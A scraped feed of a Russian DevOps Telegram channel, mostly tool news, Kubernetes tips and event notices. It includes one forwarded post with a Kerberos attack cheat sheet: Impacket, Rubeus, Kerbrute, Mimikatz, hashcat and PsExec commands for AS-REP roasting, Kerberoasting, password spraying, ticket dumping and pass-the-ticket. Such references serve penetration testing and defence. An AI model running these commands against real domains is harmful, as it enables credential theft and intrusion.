This media is not supported in your browser
VIEW IN TELEGRAM
Kubectl — это утилита командной строки в Kubernetes для запуска команд в кластерах. Помогает развертывать приложения и микросервисы, просматривать ресурсы и управлять ими, проверять файлы журналов и другое.
С помощью плагина OpenAI утилита может генерировать манифесты Kubernetes — это помогает избегать поиска и сбора случайных манифестов при разработке/тестировании.
Способна интегрироваться с внешними редакторами, такими как vscode или vim.
Поиграйтесь с ней, чтобы определить, где она может быть полезна для вас — и делитесь с коллегами 🤝
#kubernetes #kubectl #k8s #openai #devops
@DevOpsKaz
С помощью плагина OpenAI утилита может генерировать манифесты Kubernetes — это помогает избегать поиска и сбора случайных манифестов при разработке/тестировании.
Способна интегрироваться с внешними редакторами, такими как vscode или vim.
Поиграйтесь с ней, чтобы определить, где она может быть полезна для вас — и делитесь с коллегами 🤝
#kubernetes #kubectl #k8s #openai #devops
@DevOpsKaz
🔥5👍2😎2
This media is not supported in your browser
VIEW IN TELEGRAM
Архитектура Facebook также включает дополнительные сервисы для мониторинга, аналитики, резервного копирования, восстановления, рекомендательных систем, масштабируемости, оптимизации производительности и надежности.
#devops #facebook
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1
Продолжаем делиться опытом по выходным через книги.
👉 Сегодня это — книга Чистый код Роберта Мартина.
Даже плохой программный код может работать. Однако если код не является «чистым», это всегда будет мешать развитию проекта и компании-разработчика, отнимая значительные ресурсы на его поддержку и «укрощение».
Эта книга посвящена хорошему программированию. Она полна реальных примеров кода и рассматривает код с различных направлений: сверху вниз, снизу вверх и даже изнутри. Вы научитесь отличать хороший код от плохого и узнаете, как писать хороший код и как преобразовать плохой код в хороший.
Читайте и делитесь с коллегами 🤝
#devops #devopsbooks
👉 Сегодня это — книга Чистый код Роберта Мартина.
Даже плохой программный код может работать. Однако если код не является «чистым», это всегда будет мешать развитию проекта и компании-разработчика, отнимая значительные ресурсы на его поддержку и «укрощение».
Эта книга посвящена хорошему программированию. Она полна реальных примеров кода и рассматривает код с различных направлений: сверху вниз, снизу вверх и даже изнутри. Вы научитесь отличать хороший код от плохого и узнаете, как писать хороший код и как преобразовать плохой код в хороший.
Читайте и делитесь с коллегами 🤝
#devops #devopsbooks
👍4🔥3
#devops #DevOpsИнженер #sre #cv
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤1👍1
В новую версию вошли апдейты с отчетами о соблюдении стандартов, правилами целевых веток мерж-реквестов, разрешимыми потоками проблем, ускоренными процессами слияния и другим. Всего — более 25 улучшений.
Помимо улучшений появилось и кое-что новое. Например,
виджет связанных элементов в задачах, целях и ключевых результатах. Или настраиваемая политика заблокированных пользователей.
Познакомьтесь с релизом здесь и поделитесь с коллегами 🤝
#devops #gitlab #gitlab165
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4⚡2❤2
💼 Развертывание и управление:
— API {REST} и FakeRest для развертывания
— Apigee, MuleSoft Anypoint, IBM API Connect для управления
🧪 Тестирование:
— APACHE JMeter и JMeter™ для нагрузочного тестирования
— SoapUI для функциональных тестов
— Rest-Assured для макетов и тестов
🔄 Генерация кода:
— Swagger и RAML Codegen
🔐 Безопасность:
— От общих инструментов, вроде Postman, до нишевых OWASP, ZAP И API Fortress
— Autho, Okta и Keycloak прикроют при авторизации
📊 Контроль:
— Боги мониторинга New Relic, Datadog и AppDynamics
🛡 Защита:
— Cloudflare, AWS WAF и Брандмауэр Azure для надежной защиты
🔍 Дизайн и разработка:
— Swagger (OpenAPI) для спецификаций
— RAML, PAML & API Blueprint для языков
— Postman за изящный дизайн и тестирование
— Mockoon для макетных серверов
#devops #api #aws #azure #cloudflare #apache #swagger
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥4😎2⚡1❤1
Эта шпаргалка предлагает краткую сводку по ключевым сетевым элементам основных поставщиков облачных услуг.
Сетевые компоненты — основа облачной инфраструктуры, которая гарантирует подключение, масштабируемость и функциональность облачных сервисов.
Это маршрутизаторы, подсистемы балансировки нагрузки и брандмауэры. Они обеспечивают безопасный обмен данными между серверами и клиентами. А CDN оптимизируют доставку контента, кэшируя данные на периферии, уменьшая задержки и улучшая взаимодействие с пользователем.
Все сетевые элементы работают вместе, чтобы создать надежную и быстро реагирующую облачную экосистему.
👉 Расскажите в комментариях, какие у вас были сложности настройки и управления этими сетевыми компонентами? Возможно, кто-то другой их уже проходил и может подсказать вам 😉
#devops #cloud
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2⚡1
Набор рекомендаций по безопасности развертывания Kubernetes.
Цель этого контрольного списка — систематизировать подход к безопасности кластера Kubernetes и обеспечить выполнение всех шагов для защиты кластера от угроз.
Он дает организациям отправную точку для оценки безопасности развертывания Kubernetes и внесения любых изменений для полной защиты.
Рекомендации списка разбиты по категориям:
➖ Аутентификация и авторизация
➖ Секреты
➖ Безопасность конфигурации кластера
➖ Аудит и регистрация
➖ Безопасная конфигурация ОС
➖ Сетевая безопасность
➖ Безопасная настройка рабочих нагрузок
➖ Безопасная сборка образа
Следуйте рекомендациям и вы предпримете важные шаги для защиты сред Kubernetes 🤝
@DevOpsKaz
Цель этого контрольного списка — систематизировать подход к безопасности кластера Kubernetes и обеспечить выполнение всех шагов для защиты кластера от угроз.
Он дает организациям отправную точку для оценки безопасности развертывания Kubernetes и внесения любых изменений для полной защиты.
Рекомендации списка разбиты по категориям:
Следуйте рекомендациям и вы предпримете важные шаги для защиты сред Kubernetes 🤝
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5⚡2👍1
В их репозитории собраны ссылки от различных вендоров. Среди них: Gitlab, Oracle, Azure, Microsoft, Google, Elastic и множество других.
_____________________
Если хотите учиться на русском, рассмотрите курсы от Слёрм — по Kubernetes, DevOps, SRE, Безопасности, Работе с данными, IaC и другим скиллам. Граждане Казахстана могут купить их в рассрочку от Kaspi либо по региональной скидке от 10%.
Условия только для наших подписчиков
Пользуйтесь и делитесь с коллегами 🤝
#devops #k8s #kubernetes #iac #sre #learning
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5⚡2🔥2
Grafana — система визуализации данных, ориентированная на данные систем ИТ-мониторинга. Новая версия Grafana содержит улучшения по части дашбордов и визуализации данных. Теперь дашборды по-настоящему дашборды и интерактивные!
Появились кнопки визуализации на панелях, автоматически сгенерированные заголовки и описания панелей.
В Grafana Enterprise также добавили новые инструменты, которые помогут лучше управлять разрешениями учетных записей пользователей и служб.
Есть и улучшения, которые оптимизируют процессы оповещения, улучшают навигацию по результатам трассировки.
👉 Полный список изменений можно узнать здесь
#devops #grafana
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2👍2🔥1
3 ноября состоится открытая online-встреча CISO EURASIA 2023
Спикеры:
TSARKA, ISACA, Toimrat, Eurasian Digital Foundation, Air Astana, Казминералс, PwC Kazakhstan, Kcell, Комитет Информационной Безопасности МЦРИАП РК и др.
Ключевые темы:
➖ Обеспечение киберустойчивости в регионе: рабочие стратегии;
➖ Взгляд в будущее: глобальные тренды промышленной кибербезопасности;
➖ Практика: опыт разработки стратегии ИБ и киберзащиты производственной инфраструктуры;
➖ Мошенники идут в ногу со временем: как развивать механизмы антифрода;
➖ Персональные данные: диалог с регулятором;
➖ В тренде: развитие нейросетей и риски, связанные с ИИ;
➖ Дискуссионный клуб: роль CISO в общей и цифровой стратегии компании;
➖ ИБ компетенции: какие навыки востребованы для ИБ руководителей и их команд;
➖ Инициативы по повышению осведомленности, проблемы при разработке и внедрении AWARENESS программ.
Спикеры:
TSARKA, ISACA, Toimrat, Eurasian Digital Foundation, Air Astana, Казминералс, PwC Kazakhstan, Kcell, Комитет Информационной Безопасности МЦРИАП РК и др.
Ключевые темы:
➖ Обеспечение киберустойчивости в регионе: рабочие стратегии;
➖ Взгляд в будущее: глобальные тренды промышленной кибербезопасности;
➖ Практика: опыт разработки стратегии ИБ и киберзащиты производственной инфраструктуры;
➖ Мошенники идут в ногу со временем: как развивать механизмы антифрода;
➖ Персональные данные: диалог с регулятором;
➖ В тренде: развитие нейросетей и риски, связанные с ИИ;
➖ Дискуссионный клуб: роль CISO в общей и цифровой стратегии компании;
➖ ИБ компетенции: какие навыки востребованы для ИБ руководителей и их команд;
➖ Инициативы по повышению осведомленности, проблемы при разработке и внедрении AWARENESS программ.
❤3🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
В отличие от других программ, вы можете не только восстанавливать удаленные файлы, но и перезаписывать данные.
Нужен только Linux и права root.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3⚡3🔥3
Infra + K8s: KZ
7 ноября приглашаем DevOps и DevSecOps, архитекторов и разработчиков, специалистов ИБ и SRE-инженеров.
Вас ждут технические доклады, продуктовые обзоры и передовые практики от ведущих разработчиков и экспертов по контейнерным технологиям. Эксперты поделятся кейсами и расскажут, как Kubernetes® помогает решать задачи разработки и бизнеса. Ну и конечно, поговорим про облака и безопасность.
А ещё расскажем о том, как мы создаём и развиваем платформу для эффективной работы внутри Yandex Cloud.
Эксперты из Yandex Cloud, AirAstana, Aviata, Kolesa Group, Rocketdata.
Техноконтент, нетворкинг-сессия и афтерпати, и всё это — в очень атмосферном месте.
Адрес: Hazbin, Алматы, улица Байтурсынова, 141.
Время: с 12:00 до 20:00.
Участие бесплатное, но необходима регистрация.
7 ноября приглашаем DevOps и DevSecOps, архитекторов и разработчиков, специалистов ИБ и SRE-инженеров.
Вас ждут технические доклады, продуктовые обзоры и передовые практики от ведущих разработчиков и экспертов по контейнерным технологиям. Эксперты поделятся кейсами и расскажут, как Kubernetes® помогает решать задачи разработки и бизнеса. Ну и конечно, поговорим про облака и безопасность.
А ещё расскажем о том, как мы создаём и развиваем платформу для эффективной работы внутри Yandex Cloud.
Эксперты из Yandex Cloud, AirAstana, Aviata, Kolesa Group, Rocketdata.
Техноконтент, нетворкинг-сессия и афтерпати, и всё это — в очень атмосферном месте.
Адрес: Hazbin, Алматы, улица Байтурсынова, 141.
Время: с 12:00 до 20:00.
Участие бесплатное, но необходима регистрация.
🔥8👍3❤2
Маск критиковал затраты и сложность бывшего Twitter, а ныне платформы X. Это не всегда было красиво, но определенно эффективно. Сайт не только работает, несмотря на кадровые изменения, но и все больше экспериментирует.
Например, он сделал #CloudExit ключевым компонентом программы экономии средств. Вот что говорят об этом его инженеры:
«Сократили затраты на облачных поставщиков и многое вернули на локальную базу. Перенесли все media/blob artifacts из облако и сократили его объем на 60%. Так мы уменьшили ежемесячные расходы на облако на 60%, а затраты на обработку облачных данных на 75%»
А в рамках проекта Х их затраты — это 100 миллионов долларов в год на AWS. Просто вышли из облака и сделали это командой, которая вчетверо меньше той, что была раньше. Иногда и такие меры работают!
#devops #cloud
Например, он сделал #CloudExit ключевым компонентом программы экономии средств. Вот что говорят об этом его инженеры:
«Сократили затраты на облачных поставщиков и многое вернули на локальную базу. Перенесли все media/blob artifacts из облако и сократили его объем на 60%. Так мы уменьшили ежемесячные расходы на облако на 60%, а затраты на обработку облачных данных на 75%»
А в рамках проекта Х их затраты — это 100 миллионов долларов в год на AWS. Просто вышли из облака и сделали это командой, которая вчетверо меньше той, что была раньше. Иногда и такие меры работают!
#devops #cloud
🔥16❤3😎2👍1
Стратегии развертывания Kubernetes 👆
➖ Повторное создание (Recreate)
Сперва удаление текущей версии приложения, затем развертывание новой версии.
➖ Постепенное развертывание (Rolling)
Все инстансы приложения будут последовательно обновляться до новой версии.
➖ Сине-зеленое развертывание (Blue/Green)
Эта стратегия базируется на двух продуктивных средах: «синяя» — там, где живут старые версии приложения, и «зеленая» — зона, где мы запускаем новую версию приложения.
➖ Канареечное развертывание (Canary)
«Канареечный» деплой схож с зелено-синей стратегией. Часть текущих инстансов приложения заменяется новой версией, на которую переключается часть трафика.
➖ A/B testing
Обычно это стратегия принятия бизнес-решений на основе статистики. Она может быть реализована путем добавления к Canary дополнительной функциональности при определенных условиях. Например, куки браузера, язык или параметры запроса. Вместо того, чтобы открыть доступ к новой функции всем пользователям, ее предлагают лишь ограниченной их части.
➖ Shadow
Теневое развертывание заключается в выпуске версии 1.1 наряду с версией 1.0, перехвате входящих запросов с первой версии и отправке на вторую без влияния на трафик. Это особенно полезно для тестирования production нагрузки на новую функцию.
Каждая стратегия предлагает свой подход к управлению обновлениями.
#devops #kubernetes #k8s
@DevOpsKaz
Сперва удаление текущей версии приложения, затем развертывание новой версии.
Все инстансы приложения будут последовательно обновляться до новой версии.
Эта стратегия базируется на двух продуктивных средах: «синяя» — там, где живут старые версии приложения, и «зеленая» — зона, где мы запускаем новую версию приложения.
«Канареечный» деплой схож с зелено-синей стратегией. Часть текущих инстансов приложения заменяется новой версией, на которую переключается часть трафика.
Обычно это стратегия принятия бизнес-решений на основе статистики. Она может быть реализована путем добавления к Canary дополнительной функциональности при определенных условиях. Например, куки браузера, язык или параметры запроса. Вместо того, чтобы открыть доступ к новой функции всем пользователям, ее предлагают лишь ограниченной их части.
Теневое развертывание заключается в выпуске версии 1.1 наряду с версией 1.0, перехвате входящих запросов с первой версии и отправке на вторую без влияния на трафик. Это особенно полезно для тестирования production нагрузки на новую функцию.
Каждая стратегия предлагает свой подход к управлению обновлениями.
#devops #kubernetes #k8s
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍4🔥3
Разыгрываем 7 ваучеров на бесплатное обучение и сертификацию от Cloud Native Computing Foundation. Ваучеры дают 100% скидку на курс или экзамен по Kubernetes из списка ниже до 23 февраля — и мы хотим ими поделиться:
Мы хотим, чтобы сообщество DevOps развивалось, поэтому условия розыгрыша просты.
#kubernetes #cka #ckad #cks #k8s #linuxfoundation #cncf
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👍8❤2🏆2
Она будет интересна всем, кто хоть как-то связан с разработкой ПО. Добавив её в закладки, вы получите огромную библиотеку о таких вещах, как:
Особо хвалят диаграммы.
#devops #cheatsheet
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥7👾2
Forwarded from Похек (Sergey Zybnev)
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.
➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec
➡️ ASREP-Roast
➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
➡️ Rubeus
Извлечение из всех учетных записей домена
➡️ Cracking
Windows
Linux
➡️ Brute Force
➡️ Kerbrute
➡️ Rubeus
со списком пользователей
Kerberos-based Password Spraying
➡️ Kerberoasting
➡️ Impacket
➡️ Rubeus
Kerberoast всех пользователей домена
Все пользователи в поздразделении OU
Атака на конкретных пользователей
➡️ Pass-The-Ticket
➡️ Mimikatz
Сбор тикетов
Инжект тикета
Создать CMD с инжектированным тикетом
➡️ Rubeus
Дамп тикетов
Инжект тикета
➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
🌚 @poxek
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.
Rubeus
Kerbrute
Impacket
PsExec
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"ㅤ
Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"ㅤ
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproastㅤ
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt
Linux
john --wordlist rockyou.txt Hashes.txt --format=krb5tgsㅤ
hashcat -m 18200 -a 3 Hashes.txt rockyou
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>ㅤ
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>ㅤ
Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>ㅤ
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -requestㅤ
Kerberoast всех пользователей домена
.\Rubeus kerberoastㅤ
Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=localㅤ
Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVCㅤ
Сбор тикетов
sekurlsa::tickets /export
Инжект тикета
kerberos::ptt <.kirbi file>
Создать CMD с инжектированным тикетом
misc::cmdㅤ
Дамп тикетов
.\Rubeus.exe dump
Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>ㅤ
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmdㅤ
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4😎2👍1
Grafana Tempo — инструмент трассировки с открытым исходным кодом. И на днях состоялся релиз версии 2.3. Рассказываем, что это и почему важно.
🚩 Немного справки: для его работы требуется только объектное хранилище, типа Google Cloud Storage или Amazon S3. Он позволяет принимать, записывать и хранить полные пути чтения наших производственных и тестовых окружений, а также окружений для разработки. Совместим с OpenTelemetry и Opentracing и интегрируется с другими инструментами, вроде Prometheus.
🚩 Что нового в Tempo 2.3:
➖ гораздо более производительные запросы TraceQL
➖ задержка поиска сильно сокращена за счёт новой версии бэкенда
➖ новые структурные операторы: например, для поиска фрагментов HTTP-запросов
➖ функция, которая показывает, какие ошибки или сообщения возникают в вашем кластере
➖ полная поддержка атрибутов OpenTelemetry
🤝 Дальше — еще круче. Делитесь с коллегами!
#devops #grafana #trace #grafanatempo #opentelemetry
@DevOpsKaz
🤝 Дальше — еще круче. Делитесь с коллегами!
#devops #grafana #trace #grafanatempo #opentelemetry
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3⚡2🔥2
Это база: нюансы работы с Redis. Часть 1
Cерия статей про неочевидные нюансы работы с Redis.
В первой части Петр, DevOps-инженер компании Nixys, подробно рассказал об основных концепциях и понятиях этой БД и подготовил чек-лист, который может помочь вам в оптимизации этого NoSQL решения.
Приятного чтения!
Cерия статей про неочевидные нюансы работы с Redis.
В первой части Петр, DevOps-инженер компании Nixys, подробно рассказал об основных концепциях и понятиях этой БД и подготовил чек-лист, который может помочь вам в оптимизации этого NoSQL решения.
Приятного чтения!
👍7😎4🔥2